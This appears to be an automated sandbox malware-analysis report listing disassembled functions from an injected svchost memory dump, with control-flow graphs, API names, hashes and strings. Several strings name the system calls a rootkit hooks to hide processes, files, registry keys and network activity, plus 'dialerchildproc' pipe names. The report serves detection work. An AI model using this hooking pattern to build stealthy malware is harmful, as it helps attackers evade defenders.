                                                                                control_flow_graph 365 257e10a2b2c-257e10a2ba5 call 257e10c2ce0 368 257e10a2ee0-257e10a2f03 365->368 369 257e10a2bab-257e10a2bb1 365->369 369->368 370 257e10a2bb7-257e10a2bba 369->370 370->368 371 257e10a2bc0-257e10a2bc3 370->371 371->368 372 257e10a2bc9-257e10a2bd9 GetModuleHandleA 371->372 373 257e10a2bed 372->373 374 257e10a2bdb-257e10a2beb call 257e10b6090 372->374 376 257e10a2bf0-257e10a2c0e 373->376 374->376 376->368 379 257e10a2c14-257e10a2c33 StrCmpNIW 376->379 379->368 380 257e10a2c39-257e10a2c3d 379->380 380->368 381 257e10a2c43-257e10a2c4d 380->381 381->368 382 257e10a2c53-257e10a2c5a 381->382 382->368 383 257e10a2c60-257e10a2c73 382->383 384 257e10a2c75-257e10a2c81 383->384 385 257e10a2c83 383->385 386 257e10a2c86-257e10a2c8a 384->386 385->386 387 257e10a2c9a 386->387 388 257e10a2c8c-257e10a2c98 386->388 389 257e10a2c9d-257e10a2ca7 387->389 388->389 390 257e10a2d9d-257e10a2da1 389->390 391 257e10a2cad-257e10a2cb0 389->391 394 257e10a2ed2-257e10a2eda 390->394 395 257e10a2da7-257e10a2daa 390->395 392 257e10a2cc2-257e10a2ccc 391->392 393 257e10a2cb2-257e10a2cbf call 257e10a199c 391->393 397 257e10a2d00-257e10a2d0a 392->397 398 257e10a2cce-257e10a2cdb 392->398 393->392 394->368 394->383 399 257e10a2dbb-257e10a2dc5 395->399 400 257e10a2dac-257e10a2db8 call 257e10a199c 395->400 406 257e10a2d3a-257e10a2d3d 397->406 407 257e10a2d0c-257e10a2d19 397->407 398->397 405 257e10a2cdd-257e10a2cea 398->405 402 257e10a2df5-257e10a2df8 399->402 403 257e10a2dc7-257e10a2dd4 399->403 400->399 412 257e10a2e05-257e10a2e12 lstrlenW 402->412 413 257e10a2dfa-257e10a2e03 call 257e10a1bbc 402->413 403->402 411 257e10a2dd6-257e10a2de3 403->411 414 257e10a2ced-257e10a2cf3 405->414 409 257e10a2d3f-257e10a2d49 call 257e10a1bbc 406->409 410 257e10a2d4b-257e10a2d58 lstrlenW 406->410 407->406 415 257e10a2d1b-257e10a2d28 407->415 409->410 421 257e10a2d93-257e10a2d98 409->421 417 257e10a2d5a-257e10a2d64 410->417 418 257e10a2d7b-257e10a2d8d call 257e10a3844 410->418 419 257e10a2de6-257e10a2dec 411->419 423 257e10a2e35-257e10a2e3f call 257e10a3844 412->423 424 257e10a2e14-257e10a2e1e 412->424 413->412 429 257e10a2e4a-257e10a2e55 413->429 414->421 422 257e10a2cf9-257e10a2cfe 414->422 425 257e10a2d2b-257e10a2d31 415->425 417->418 428 257e10a2d66-257e10a2d79 call 257e10a152c 417->428 418->421 433 257e10a2e42-257e10a2e44 418->433 419->429 430 257e10a2dee-257e10a2df3 419->430 421->433 422->397 422->414 423->433 424->423 434 257e10a2e20-257e10a2e33 call 257e10a152c 424->434 425->421 435 257e10a2d33-257e10a2d38 425->435 428->418 428->421 437 257e10a2e57-257e10a2e5b 429->437 438 257e10a2ecc-257e10a2ed0 429->438 430->402 430->419 433->394 433->429 434->423 434->429 435->406 435->425 442 257e10a2e63-257e10a2e7d call 257e10a85c0 437->442 443 257e10a2e5d-257e10a2e61 437->443 438->394 446 257e10a2e80-257e10a2e83 442->446 443->442 443->446 449 257e10a2e85-257e10a2ea3 call 257e10a85c0 446->449 450 257e10a2ea6-257e10a2ea9 446->450 449->450 450->438 452 257e10a2eab-257e10a2ec9 call 257e10a85c0 450->452 452->438
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                                Function 00000257E10A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                                Function 00000257E10AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04
                                                                                Function 00000257E10A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704
                                                                                Function 00000257E10A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768
                                                                                Function 00000257E1076910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 257e1076910-257e1076916 208 257e1076918-257e107691b 207->208 209 257e1076951-257e107695b 207->209 210 257e107691d-257e1076920 208->210 211 257e1076945-257e1076984 call 257e1076fc0 208->211 212 257e1076a78-257e1076a8d 209->212 213 257e1076938 __scrt_dllmain_crt_thread_attach 210->213 214 257e1076922-257e1076925 210->214 227 257e107698a-257e107699f call 257e1076e54 211->227 228 257e1076a52 211->228 215 257e1076a9c-257e1076ab6 call 257e1076e54 212->215 216 257e1076a8f 212->216 222 257e107693d-257e1076944 213->222 218 257e1076927-257e1076930 214->218 219 257e1076931-257e1076936 call 257e1076f04 214->219 230 257e1076ab8-257e1076aed call 257e1076f7c call 257e1076e1c call 257e1077318 call 257e1077130 call 257e1077154 call 257e1076fac 215->230 231 257e1076aef-257e1076b20 call 257e1077190 215->231 220 257e1076a91-257e1076a9b 216->220 219->222 239 257e1076a6a-257e1076a77 call 257e1077190 227->239 240 257e10769a5-257e10769b6 call 257e1076ec4 227->240 232 257e1076a54-257e1076a69 228->232 230->220 241 257e1076b22-257e1076b28 231->241 242 257e1076b31-257e1076b37 231->242 239->212 259 257e10769b8-257e10769dc call 257e10772dc call 257e1076e0c call 257e1076e38 call 257e107ac0c 240->259 260 257e1076a07-257e1076a11 call 257e1077130 240->260 241->242 246 257e1076b2a-257e1076b2c 241->246 247 257e1076b7e-257e1076b94 call 257e107268c 242->247 248 257e1076b39-257e1076b43 242->248 253 257e1076c1f-257e1076c2c 246->253 268 257e1076bcc-257e1076bce 247->268 269 257e1076b96-257e1076b98 247->269 254 257e1076b45-257e1076b4d 248->254 255 257e1076b4f-257e1076b5d call 257e1085780 248->255 262 257e1076b63-257e1076b78 call 257e1076910 254->262 255->262 272 257e1076c15-257e1076c1d 255->272 259->260 310 257e10769de-257e10769e5 __scrt_dllmain_after_initialize_c 259->310 260->228 280 257e1076a13-257e1076a1f call 257e1077180 260->280 262->247 262->272 270 257e1076bd5-257e1076bea call 257e1076910 268->270 271 257e1076bd0-257e1076bd3 268->271 269->268 277 257e1076b9a-257e1076bbc call 257e107268c call 257e1076a78 269->277 270->272 289 257e1076bec-257e1076bf6 270->289 271->270 271->272 272->253 277->268 304 257e1076bbe-257e1076bc6 call 257e1085780 277->304 297 257e1076a45-257e1076a50 280->297 298 257e1076a21-257e1076a2b call 257e1077098 280->298 294 257e1076bf8-257e1076bff 289->294 295 257e1076c01-257e1076c11 call 257e1085780 289->295 294->272 295->272 297->232 298->297 309 257e1076a2d-257e1076a3b 298->309 304->268 309->297 310->260 311 257e10769e7-257e1076a04 call 257e107abc8 310->311 311->260
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C
                                                                                Function 00000257E10ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                                • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                                  • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                                  • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                                  • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C
                                                                                Function 00000257E10A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04
                                                                                Function 00000257E1079944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 465 257e1079944-257e10799ac call 257e107a814 468 257e1079e13-257e1079e1b call 257e107bb48 465->468 469 257e10799b2-257e10799b5 465->469 469->468 470 257e10799bb-257e10799c1 469->470 472 257e10799c7-257e10799cb 470->472 473 257e1079a90-257e1079aa2 470->473 472->473 477 257e10799d1-257e10799dc 472->477 475 257e1079aa8-257e1079aac 473->475 476 257e1079d63-257e1079d67 473->476 475->476 478 257e1079ab2-257e1079abd 475->478 480 257e1079d69-257e1079d70 476->480 481 257e1079da0-257e1079daa call 257e1078a34 476->481 477->473 479 257e10799e2-257e10799e7 477->479 478->476 483 257e1079ac3-257e1079aca 478->483 479->473 484 257e10799ed-257e10799f7 call 257e1078a34 479->484 480->468 485 257e1079d76-257e1079d9b call 257e1079e1c 480->485 481->468 491 257e1079dac-257e1079dcb call 257e1076d40 481->491 488 257e1079c94-257e1079ca0 483->488 489 257e1079ad0-257e1079b07 call 257e1078e10 483->489 484->491 499 257e10799fd-257e1079a28 call 257e1078a34 * 2 call 257e1079124 484->499 485->481 488->481 492 257e1079ca6-257e1079caa 488->492 489->488 503 257e1079b0d-257e1079b15 489->503 496 257e1079cac-257e1079cb8 call 257e10790e4 492->496 497 257e1079cba-257e1079cc2 492->497 496->497 510 257e1079cdb-257e1079ce3 496->510 497->481 502 257e1079cc8-257e1079cd5 call 257e1078cb4 497->502 533 257e1079a2a-257e1079a2e 499->533 534 257e1079a48-257e1079a52 call 257e1078a34 499->534 502->481 502->510 507 257e1079b19-257e1079b4b 503->507 512 257e1079c87-257e1079c8e 507->512 513 257e1079b51-257e1079b5c 507->513 514 257e1079ce9-257e1079ced 510->514 515 257e1079df6-257e1079e12 call 257e1078a34 * 2 call 257e107baa8 510->515 512->488 512->507 513->512 516 257e1079b62-257e1079b7b 513->516 518 257e1079d00 514->518 519 257e1079cef-257e1079cfe call 257e10790e4 514->519 515->468 520 257e1079c74-257e1079c79 516->520 521 257e1079b81-257e1079bc6 call 257e10790f8 * 2 516->521 529 257e1079d03-257e1079d0d call 257e107a8ac 518->529 519->529 525 257e1079c84 520->525 546 257e1079bc8-257e1079bee call 257e10790f8 call 257e107a038 521->546 547 257e1079c04-257e1079c0a 521->547 525->512 529->481 544 257e1079d13-257e1079d61 call 257e1078d44 call 257e1078f50 529->544 533->534 538 257e1079a30-257e1079a3b 533->538 534->473 550 257e1079a54-257e1079a74 call 257e1078a34 * 2 call 257e107a8ac 534->550 538->534 543 257e1079a3d-257e1079a42 538->543 543->468 543->534 544->481 565 257e1079c15-257e1079c72 call 257e1079870 546->565 566 257e1079bf0-257e1079c02 546->566 554 257e1079c0c-257e1079c10 547->554 555 257e1079c7b 547->555 571 257e1079a8b 550->571 572 257e1079a76-257e1079a80 call 257e107a99c 550->572 554->521 556 257e1079c80 555->556 556->525 565->556 566->546 566->547 571->473 575 257e1079a86-257e1079def call 257e10786ac call 257e107a3f4 call 257e10788a0 572->575 576 257e1079df0-257e1079df5 call 257e107baa8 572->576 575->576 576->515
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704
                                                                                Function 00000257E10AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 586 257e10aa544-257e10aa5ac call 257e10ab414 589 257e10aa5b2-257e10aa5b5 586->589 590 257e10aaa13-257e10aaa1b call 257e10ac748 586->590 589->590 591 257e10aa5bb-257e10aa5c1 589->591 593 257e10aa690-257e10aa6a2 591->593 594 257e10aa5c7-257e10aa5cb 591->594 596 257e10aa963-257e10aa967 593->596 597 257e10aa6a8-257e10aa6ac 593->597 594->593 598 257e10aa5d1-257e10aa5dc 594->598 601 257e10aa9a0-257e10aa9aa call 257e10a9634 596->601 602 257e10aa969-257e10aa970 596->602 597->596 599 257e10aa6b2-257e10aa6bd 597->599 598->593 600 257e10aa5e2-257e10aa5e7 598->600 599->596 603 257e10aa6c3-257e10aa6ca 599->603 600->593 604 257e10aa5ed-257e10aa5f7 call 257e10a9634 600->604 601->590 615 257e10aa9ac-257e10aa9cb call 257e10a7940 601->615 602->590 605 257e10aa976-257e10aa99b call 257e10aaa1c 602->605 607 257e10aa6d0-257e10aa707 call 257e10a9a10 603->607 608 257e10aa894-257e10aa8a0 603->608 604->615 619 257e10aa5fd-257e10aa628 call 257e10a9634 * 2 call 257e10a9d24 604->619 605->601 607->608 624 257e10aa70d-257e10aa715 607->624 608->601 612 257e10aa8a6-257e10aa8aa 608->612 616 257e10aa8ba-257e10aa8c2 612->616 617 257e10aa8ac-257e10aa8b8 call 257e10a9ce4 612->617 616->601 623 257e10aa8c8-257e10aa8d5 call 257e10a98b4 616->623 617->616 630 257e10aa8db-257e10aa8e3 617->630 655 257e10aa62a-257e10aa62e 619->655 656 257e10aa648-257e10aa652 call 257e10a9634 619->656 623->601 623->630 628 257e10aa719-257e10aa74b 624->628 632 257e10aa751-257e10aa75c 628->632 633 257e10aa887-257e10aa88e 628->633 635 257e10aa9f6-257e10aaa12 call 257e10a9634 * 2 call 257e10ac6a8 630->635 636 257e10aa8e9-257e10aa8ed 630->636 632->633 637 257e10aa762-257e10aa77b 632->637 633->608 633->628 635->590 639 257e10aa8ef-257e10aa8fe call 257e10a9ce4 636->639 640 257e10aa900 636->640 641 257e10aa781-257e10aa7c6 call 257e10a9cf8 * 2 637->641 642 257e10aa874-257e10aa879 637->642 650 257e10aa903-257e10aa90d call 257e10ab4ac 639->650 640->650 667 257e10aa804-257e10aa80a 641->667 668 257e10aa7c8-257e10aa7ee call 257e10a9cf8 call 257e10aac38 641->668 647 257e10aa884 642->647 647->633 650->601 664 257e10aa913-257e10aa961 call 257e10a9944 call 257e10a9b50 650->664 655->656 661 257e10aa630-257e10aa63b 655->661 656->593 671 257e10aa654-257e10aa674 call 257e10a9634 * 2 call 257e10ab4ac 656->671 661->656 663 257e10aa63d-257e10aa642 661->663 663->590 663->656 664->601 675 257e10aa87b 667->675 676 257e10aa80c-257e10aa810 667->676 686 257e10aa7f0-257e10aa802 668->686 687 257e10aa815-257e10aa872 call 257e10aa470 668->687 692 257e10aa676-257e10aa680 call 257e10ab59c 671->692 693 257e10aa68b 671->693 680 257e10aa880 675->680 676->641 680->647 686->667 686->668 687->680 696 257e10aa9f0-257e10aa9f5 call 257e10ac6a8 692->696 697 257e10aa686-257e10aa9ef call 257e10a92ac call 257e10aaff4 call 257e10a94a0 692->697 693->593 696->635 697->696
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714
                                                                                Function 00000257E10AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328
                                                                                Function 00000257E10A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14
                                                                                Function 00000257E10AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
